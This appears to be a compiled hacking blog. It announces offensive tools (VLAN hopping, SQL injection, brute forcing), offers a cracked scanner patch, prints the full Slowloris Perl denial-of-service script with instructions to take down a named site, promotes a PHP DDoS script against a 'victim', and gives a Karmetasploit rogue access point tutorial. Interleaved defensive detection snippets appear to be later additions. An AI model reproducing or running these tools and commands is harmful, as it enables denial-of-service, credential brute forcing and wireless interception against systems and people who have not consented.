ACUNETIX WEB VULNERABILITY SCANNER V8


ACUNETIX WEB VULNERABILITY SCANNER 8 BETA 





Acunetix Web Vulnerability Scanner 8 BETA Released for download


VOIP HOPPER 2.01


VOIP HOPPER 2.01 RELEASED – IP PHONE VLAN HOPPING TOOL




VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop into the Voice VLAN on specific ethernet switches. VoIP Hopper does this by mimicking the behavior of an IP Phone, in Cisco, Avaya, and Nortel environments.

This requires two important steps in order for the tool to traverse VLANs for unauthorized access. First, discovery of the correct 12 bit Voice VLAN ID (VVID) used by the IP Phones is required. VoIP Hopper supports multiple protocol discovery methods (CDP, DHCP, LLDP-MED, 802.1q ARP) for this important first step. Second, the tool creates a virtual VoIP ethernet interface on the OS. It then inserts a spoofed 4-byte 802.1q vlan header containing the 12 bit VVID into a spoofed DHCP request.


New Features

* New “Assessment” mode: Interactive, menu driven command interface, improves ability to VLAN Hop in Pentesting when the security tester is working against an unknown network infrastructure.
* New VLAN Discovery methods (802.1q ARP, LLDP-MED).
* LLDP-MED spoofing and sniffing support.
* Can bypass VoIP VLAN subnets that have DHCP disabled, and spoof the IP address and MAC address of a phone by setting a static IP.
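
For defenders, the 4-byte 802.1Q tag described above is the thing to look for on a trunk or port mirror: a tagged DHCP request on the voice VLAN from a MAC address that is not a known phone. The following is an added example, not part of VoIP Hopper or of the original post; the VVID 200, the phone inventory and the sample frames are constructed assumptions.

```python
import struct

TPID_8021Q = 0x8100      # EtherType value that announces an 802.1Q tag
ETHERTYPE_IPV4 = 0x0800


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ethernet(frame: bytes) -> dict:
    """Split an Ethernet frame into addresses, optional 802.1Q tag and payload."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    (ethertype,) = struct.unpack("!H", frame[12:14])
    vlan = pcp = None
    offset = 14
    if ethertype == TPID_8021Q:
        if len(frame) < 18:
            raise ValueError("truncated 802.1Q tag")
        # Tag = 2-byte TPID + 2-byte TCI; TCI = PCP (3 bits) | DEI (1) | VID (12).
        tci, ethertype = struct.unpack("!HH", frame[14:18])
        pcp, vlan = tci >> 13, tci & 0x0FFF
        offset = 18
    return {"dst": mac_str(frame[0:6]), "src": mac_str(frame[6:12]),
            "vlan": vlan, "pcp": pcp, "ethertype": ethertype,
            "payload": frame[offset:]}


def is_dhcp_client_request(ip: bytes) -> bool:
    """True for an IPv4/UDP packet from port 68 to 67 whose BOOTP op is 1."""
    if len(ip) < 20 or ip[0] >> 4 != 4:
        return False
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 17 or len(ip) < ihl + 9:      # 17 = UDP
        return False
    sport, dport = struct.unpack("!HH", ip[ihl:ihl + 4])
    return (sport, dport) == (68, 67) and ip[ihl + 8] == 1


def unexpected_voice_vlan_clients(frames, voice_vlan, known_phone_macs):
    """Source MACs sending DHCP requests tagged with the voice VLAN
    that are not in the phone inventory."""
    known = {m.lower() for m in known_phone_macs}
    hits = []
    for raw in frames:
        f = parse_ethernet(raw)
        if f["vlan"] != voice_vlan or f["ethertype"] != ETHERTYPE_IPV4:
            continue
        if is_dhcp_client_request(f["payload"]) and f["src"] not in known:
            hits.append(f["src"])
    return hits


def _sample_frame(src_mac: str, vlan) -> bytes:
    """Constructed test data: Ethernet [+ 802.1Q] + IPv4 + UDP 68->67 + BOOTP op=1."""
    eth = b"\xff" * 6 + bytes.fromhex(src_mac.replace(":", ""))
    if vlan is not None:
        eth += struct.pack("!HH", TPID_8021Q, (5 << 13) | vlan)
    eth += struct.pack("!H", ETHERTYPE_IPV4)
    bootp = b"\x01\x01\x06\x00" + b"\x00" * 8
    udp = struct.pack("!HHHH", 68, 67, 8 + len(bootp), 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp) + len(bootp),
                     0, 0, 64, 17, 0, bytes(4), b"\xff" * 4)
    return eth + ip + udp + bootp


VOICE_VLAN = 200                                   # assumed VVID
KNOWN_PHONES = {"00:1b:54:aa:bb:01"}               # assumed phone inventory
SAMPLE_FRAMES = [
    _sample_frame("00:1b:54:aa:bb:01", 200),       # inventoried phone
    _sample_frame("3c:97:0e:11:22:33", 200),       # tagged, but not a phone
    _sample_frame("3c:97:0e:11:22:44", None),      # ordinary untagged PC
]

if __name__ == "__main__":
    print(unexpected_voice_vlan_clients(SAMPLE_FRAMES, VOICE_VLAN, KNOWN_PHONES))
```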


THE MOLE – SQL INJECTION SQLI EXPLOITATION TOOL


THE MOLE – AUTOMATIC SQL INJECTION SQLI EXPLOITATION TOOL








The Mole is an automatic SQL injection exploitation tool. You only need to provide a vulnerable URL and a valid string on the site; it can then detect the injection and exploit it, using either a union technique or a boolean query based technique. You can hack any SQL-vulnerable website using this tool.

Features
  • Support for injections using MySQL, SQL Server, Postgres and Oracle databases.
  • Command line interface. Different commands trigger different actions.
  • Developed in Python 3.
  • Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
  • Auto-completion for commands, command arguments and database, table and columns names.

PATATOR – BRUTE FORCING TOOL


PATATOR – MULTI PURPOSE BRUTE FORCING TOOL




Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Basically the author got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because:

* They either do not work or are not reliable (false negatives several times in the past)
* They are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)
* They lack very useful features that are easy to code in Python (e.g. interactive runtime)

Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-force tools and are about to code your own small script, because Patator will allow you to:

* Not write the same code over and over
* Run multi-threaded
* Benefit from useful features such as the interactive runtime commands, response logging, etc.


Currently it supports the following modules:

ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-force the password of encrypted ZIP files
keystore_pass : Brute-force the password of Java keystore files

The name “Patator” comes from this tv interview clip – patator

Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting/complaining/asking me how to use this tool.


Acunetix Vulnerability Scanner v8 Patch


Acunetix Vulnerability Scanner v8 Patch By Ghost 


Enjoy it with the amazing tool.




DOS ATTACK WITH SLOWLORIS


DDOS ATTACK WITH SLOWLORIS IN BACKTRACK 5 R3


DDOS ATTACK WITH BACKTRACK R3 using SLOWLORIS

(EDUCATIONAL PURPOSE ONLY) 


Commands

Download Script

cd Directory

chmod +x slowloris.pl

perl ./slowloris -dns www.site.com -port 80 -timeout 1 -num 1000 -cache

Wait....


Goto Browser then Type Your site (Get Down..!)




SCRIPT OF Slowloris.pl


#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;

$SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors

print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. .  ...cO888Oc..          :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
 ..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC
   .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco
  .  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc
       .   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco
 Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT

my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
    'shost=s'   => \$shost,
    'dns=s'     => \$host,
    'httpready' => \$httpready,
    'num=i'     => \$connections,
    'cache'     => \$cache,
    'port=i'    => \$port,
    'https'     => \$ssl,
    'tcpto=i'   => \$tcpto,
    'test'      => \$test,
    'timeout=i' => \$timeout,
    'version'   => \$version,
);

if ($version) {
    print "Version 0.7\n";
    exit;
}

unless ($host) {
    print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
    print "\n\tType 'perldoc $0' for help with options.\n\n";
    exit;
}

unless ($port) {
    $port = 80;
    print "Defaulting to port 80.\n";
}

unless ($tcpto) {
    $tcpto = 5;
    print "Defaulting to a 5 second tcp connection timeout.\n";
}

unless ($test) {
    unless ($timeout) {
        $timeout = 100;
        print "Defaulting to a 100 second re-try timeout.\n";
    }
    unless ($connections) {
        $connections = 1000;
        print "Defaulting to 1000 connections.\n";
    }
}

my $usemultithreading = 0;
if ( $Config{usethreads} ) {
    print "Multithreading enabled.\n";
    $usemultithreading = 1;
    use threads;
    use threads::shared;
}
else {
    print "No multithreading capabilites found!\n";
    print "Slowloris will be slower than normal as a result.\n";
}

my $packetcount : shared     = 0;
my $failed : shared          = 0;
my $connectioncount : shared = 0;

srand() if ($cache);

if ($shost) {
    $sendhost = $shost;
}
else {
    $sendhost = $host;
}
if ($httpready) {
    $method = "POST";
}
else {
    $method = "GET";
}

if ($test) {
    my @times = ( "2", "30", "90", "240", "500" );
    my $totaltime = 0;
    foreach (@times) {
        $totaltime = $totaltime + $_;
    }
    $totaltime = $totaltime / 60;
    print "This test could take up to $totaltime minutes.\n";

    my $delay   = 0;
    my $working = 0;
    my $sock;

    if ($ssl) {
        if (
            $sock = new IO::Socket::SSL(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }
    else {
        if (
            $sock = new IO::Socket::INET(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }
    if ($working) {
        if ($cache) {
            $rand = "?" . int( rand(99999999999999) );
        }
        else {
            $rand = "";
        }
        my $primarypayload =
            "GET /$rand HTTP/1.1\r\n"
          . "Host: $sendhost\r\n"
          . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
          . "Content-Length: 42\r\n";
        if ( print $sock $primarypayload ) {
            print "Connection successful, now comes the waiting game...\n";
        }
        else {
            print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
            print "Is something wrong?\nDying.\n";
            exit;
        }
    }
    else {
        print "Uhm... I can't connect to $host:$port.\n";
        print "Is something wrong?\nDying.\n";
        exit;
    }
    for ( my $i = 0 ; $i <= $#times ; $i++ ) {
        print "Trying a $times[$i] second delay: \n";
        sleep( $times[$i] );
        if ( print $sock "X-a: b\r\n" ) {
            print "\tWorked.\n";
            $delay = $times[$i];
        }
        else {
            if ( $SIG{__WARN__} ) {
                $delay = $times[ $i - 1 ];
                last;
            }
            print "\tFailed after $times[$i] seconds.\n";
        }
    }

    if ( print $sock "Connection: Close\r\n\r\n" ) {
        print "Okay that's enough time. Slowloris closed the socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }
    else {
        print "Remote server closed socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }
    if ( $delay < 166 ) {
        print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally 
takes between 200-500 threads for most servers and assuming any latency at 
all...  you might have trouble using Slowloris against this target.  You can 
tweak the -timeout flag down to less than 10 seconds but it still may not 
build the sockets in time.
EOSUCKS2BU
    }
}
else {
    print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";

    if ($usemultithreading) {
        domultithreading($connections);
    }
    else {
        doconnections( $connections, $usemultithreading );
    }
}

sub doconnections {
    my ( $num, $usemultithreading ) = @_;
    my ( @first, @sock, @working );
    my $failedconnections = 0;
    $working[$_] = 0 foreach ( 1 .. $num );    #initializing
    $first[$_]   = 0 foreach ( 1 .. $num );    #initializing
    while (1) {
        $failedconnections = 0;
        print "\t\tBuilding sockets.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 0 ) {
                if ($ssl) {
                    if (
                        $sock[$z] = new IO::Socket::SSL(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                else {
                    if (
                        $sock[$z] = new IO::Socket::INET(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                        $packetcount = $packetcount + 3;  #SYN, SYN+ACK, ACK
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                if ( $working[$z] == 1 ) {
                    if ($cache) {
                        $rand = "?" . int( rand(99999999999999) );
                    }
                    else {
                        $rand = "";
                    }
                    my $primarypayload =
                        "$method /$rand HTTP/1.1\r\n"
                      . "Host: $sendhost\r\n"
                      . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                      . "Content-Length: 42\r\n";
                    my $handle = $sock[$z];
                    if ($handle) {
                        print $handle "$primarypayload";
                        if ( $SIG{__WARN__} ) {
                            $working[$z] = 0;
                            close $handle;
                            $failed++;
                            $failedconnections++;
                        }
                        else {
                            $packetcount++;
                            $working[$z] = 1;
                        }
                    }
                    else {
                        $working[$z] = 0;
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;
                    $failed++;
                    $failedconnections++;
                }
            }
        }
        print "\t\tSending data.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 1 ) {
                if ( $sock[$z] ) {
                    my $handle = $sock[$z];
                    if ( print $handle "X-a: b\r\n" ) {
                        $working[$z] = 1;
                        $packetcount++;
                    }
                    else {
                        $working[$z] = 0;
                        #debugging info
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;
                    #debugging info
                    $failed++;
                    $failedconnections++;
                }
            }
        }
        print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
        sleep($timeout);
    }
}

sub domultithreading {
    my ($num) = @_;
    my @thrs;
    my $i                    = 0;
    my $connectionsperthread = 50;
    while ( $i < $num ) {
        $thrs[$i] =
          threads->create( \&doconnections, $connectionsperthread, 1 );
        $i += $connectionsperthread;
    }
    my @threadslist = threads->list();
    while ( $#threadslist > 0 ) {
        $failed = 0;
    }
}

__END__

 TITLE

Slowloris

VERSION

Version 0.7 Beta

DATE

06/17/2009

AUTHOR

RSnake <h@ckers.org> with threading from John Kinsella

ABSTRACT

Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service.  It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively.  It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.

AFFECTS

Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?


NOT AFFECTED

IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?

DESCRIPTION

Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of its threads as they patiently wait for more data.  Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts.  There is an added function to help you get started with finding the right sized timeouts as well.

As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances.  Think of Slowloris as the HTTP equivalent of a SYN flood.


Testing

If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:

Testing Example:

./slowloris.pl -dns www.example.com -port 80 -test

This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for.  If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).


HTTP DoS

Once you find a timeout window, you can tune Slowloris to use certain timeout windows.  For instance, if you know that the server has a timeout of 3000 seconds, but the connection is fairly latent, you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds.  The following example uses 500 sockets.  Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration.  Some are less than 300.  The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision.  The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful.  Slowloris has no way to identify if it's successful or not though.

HTTP DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5

HTTPReady Bypass

HTTPReady only follows certain rules, so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST versus a GET or HEAD request with the -httpready switch.


HTTPReady Bypass Example

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready


Stealth Host DoS

If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a separate virtual host using the -shost variable.  This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.


Stealth Host DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com


HTTPS DoS

Slowloris does support SSL/TLS on an experimental basis with the -https switch.  The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development.  Your mileage may vary.


HTTPS DoS Example:

./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https

HTTP Cache

Slowloris does support cache avoidance on an experimental basis with the -cache switch.  Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources.  The usefulness of this particular option has not been thoroughly tested.  Your mileage may vary.


 HTTP Cache Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache

 Issues

Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through NetScaler devices, in its current incarnation.  There may be ways around this, but not in this version at this time.  Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distributed, although only NetScaler has been tested.

Slowloris isn't completely quiet either, because it can't be.  Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder).  So it's not invisible if the traffic to the site is typically fairly low.  On higher traffic sites it is unlikely that it will be noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.

For some reason Slowloris works way better if run from a *Nix box than from Windows.  I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number.  If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems.  Either way, this program seems to work best if run from FreeBSD.  

Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to its logs with a lot of 400 (Bad Request) errors.  So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another.  You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
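
The log signature described in the paragraph above (many error entries from one client, written together when the held sockets finally close) can be searched for directly. The following is an added detection example, not part of Slowloris or of the original post; the log lines are constructed, the 5-second window and threshold of 20 are assumed tuning values, and counting 408 alongside the 400 mentioned in the text is an assumption about servers that log request timeouts that way.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common/combined log format prefix: ip ident user [time] "request" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, timestamp, status) or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, int(m["status"])


def find_error_bursts(lines, statuses=(400, 408), window_s=5, threshold=20):
    """Map each client IP to its largest burst of matching error entries,
    keeping only clients with >= threshold entries inside window_s seconds.
    Assumes each client's entries appear in chronological order."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)      # ip -> timestamps still inside the window
    worst = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, status = parsed
        if status not in statuses:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:    # drop entries that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            worst[ip] = max(worst.get(ip, 0), len(q))
    return worst


def sample_log():
    """Constructed access log: scattered errors, normal traffic, then a burst."""
    lines = [
        '198.51.100.21 - - [17/Jun/2009:10:01:00 +0000] "GET /a HTTP/1.1" 400 226',
        '198.51.100.21 - - [17/Jun/2009:10:07:00 +0000] "GET /b HTTP/1.1" 400 226',
        '198.51.100.21 - - [17/Jun/2009:10:12:00 +0000] "GET /c HTTP/1.1" 400 226',
        '198.51.100.20 - - [17/Jun/2009:10:14:59 +0000] "GET / HTTP/1.1" 200 5120',
    ]
    for i in range(50):              # 50 entries written within two seconds
        lines.append(
            f'203.0.113.7 - - [17/Jun/2009:10:15:{2 + i // 25:02d} +0000] '
            '"GET / HTTP/1.1" 400 226'
        )
    return lines


if __name__ == "__main__":
    for ip, count in find_error_bursts(sample_log()).items():
        print(f"{ip}: {count} error entries within 5 seconds")
```

Because the entries only appear after the sockets close, this finds the source after the fact; alerting while the connections are still open needs connection-state data rather than the access log.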


PHP DOS/DDOS ATTACK SCRIPT


PHP DOS/DDOS (DENIAL OF SERVICE) ATTACK SCRIPT


You can make a DoS attack from your server (using that nice high bandwidth connection provided by your hosting provider) to bring your victim's server/PC to its knees.
This script should be used responsibly. I did not create it; I'm merely distributing it for “educational” purposes. All the best!


HIDE FILES AND FOLDERS IN LINUX


HIDE YOUR PERSONAL FILES AND FOLDERS IN LINUX


Steps to Hide a File or Folder :

1. Open the drive containing the folder.

2. Select the folder and choose to rename it, or simply press F2 after selecting the folder.




3. Rename the folder by putting a “.” (dot) in front of current name. Press ENTER.



4. The folder is now ready to be hidden.




Viewing the Hidden File or Folder :
Proceed in the following steps to view the folder you have hidden :
1. Navigate to the location of the hidden folder.
2. In the menu bar, click the “View” tab and select to check the box next to “Show Hidden Files”. This can also be done by simply pressing “Ctrl + H”.



Your hidden folder now appears, so you can access it right away. This of course doesn’t change the hidden property of the folder. Re-hiding the folder involves just clicking on the “View” tab once more and un-checking the box next to “Show Hidden Files”, or pressing “Ctrl + H” once again.

Un-hiding the File or Folder :
Un-hiding a hidden file or folder in Linux is a much simpler task. The process is described below :
1. Follow the steps to view the hidden folder as mentioned above.
2. After the folder can be viewed, select to rename it once again.
3. Just remove the “.” (dot) you had placed at the beginning of the name of the folder and press ENTER.



The folder has been un-hidden.
Hiding a file or a folder is a basic example of the highest level of security that Linux provides its users with. This, and a lot more makes Linux the “numero uno” operating system for a secure workstation.
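
The rename in the steps above changes only what a default directory listing shows; the permission bits are what decide who can open the folder. The following added example (not part of the original post) checks both on a constructed temporary folder; the folder and file names are hypothetical.

```python
import os
import stat
import tempfile


def hide(path):
    """Rename path so its name starts with a dot, as in the steps above."""
    parent, name = os.path.split(path)
    hidden = os.path.join(parent, "." + name)
    os.rename(path, hidden)
    return hidden


def default_listing(directory):
    """Names a file manager or plain `ls` shows by default (no dot prefix)."""
    return sorted(n for n in os.listdir(directory) if not n.startswith("."))


def demo():
    with tempfile.TemporaryDirectory() as root:
        folder = os.path.join(root, "private")          # hypothetical name
        os.mkdir(folder)
        os.chmod(folder, 0o755)                         # typical default mode
        with open(os.path.join(folder, "notes.txt"), "w") as fh:
            fh.write("constructed sample data\n")
        mode_before = stat.S_IMODE(os.stat(folder).st_mode)

        hidden = hide(folder)
        with open(os.path.join(hidden, "notes.txt")) as fh:
            readable = fh.read() == "constructed sample data\n"
        result = {
            "visible_by_default": default_listing(root),
            "visible_with_show_hidden": sorted(os.listdir(root)),
            "mode_unchanged": stat.S_IMODE(os.stat(hidden).st_mode) == mode_before,
            "content_still_readable": readable,
            "other_users_can_read_after_hide":
                bool(os.stat(hidden).st_mode & stat.S_IROTH),
        }

        # Restricting the mode, not the name, is what removes access for others.
        os.chmod(hidden, 0o700)
        result["other_users_can_read_after_chmod"] = bool(
            os.stat(hidden).st_mode & stat.S_IROTH)
        return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```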


ROOT A SERVER ~ E-BOOK


HOW TO R00T ON SERVER : E-BOOK







Hello CHC (Chennai Hackers Connect) friends, here I am sharing an e-book on how to root a server.






Password:computermaniac


KARMETASPLOIT- TUTORIAL


KARMETASPLOIT- BACKTRACK 5 TUTORIAL


 


Metasploit is now one of the best tools for penetration testing, and the word Karmetasploit is derived from two words: one is KARMA (KARMA Attacks Radioed Machines Automatically) and the other is Metasploit.


So what is Karmetasploit? 

KARMA is a wireless client attack toolkit, and the integration of KARMA and Metasploit is called Karmetasploit. In 2004 Dino A. Dai Zovi and Shane A. Macaulay gave a presentation called "All your layer are belong to us", in which they described the insecurity of wireless access points and introduced the tool KARMA. This tool acts as a wireless access point and responds to all probe requests from wireless clients. Once a client has associated with the KARMA access point, every service they try to access leads to a malicious application.

The above passage gives a basic introduction to KARMA; about Metasploit you can learn from here.


Karmetasploit Tutorial Configuration 

If you are not using BackTrack 5, then you must install some dependencies such as Aircrack-ng:

$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ cd aircrack-ng
$ make
# make install
# airmon-ng start [wifi-interface]


On BackTrack (for example BackTrack 5), follow this procedure:
root@bt:/pentest/exploits/framework3# wget 


Next, a DHCP server needs to be configured so that the fake AP can connect with the network.

root@bt:/pentest/exploits/framework3# cat /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
root@bt:~# gem install activerecord sqlite3-ruby


We are almost done; now it is time to restart the wireless interface and start listening.

root@bt:~# airmon-ng
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1


What do these commands do? They create a new interface, which is the rogue interface or fake AP. Now we have to assign an IP address and DHCP configuration so the interface works properly.

root@bt:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root@bt:~# ps aux | grep dhcpd




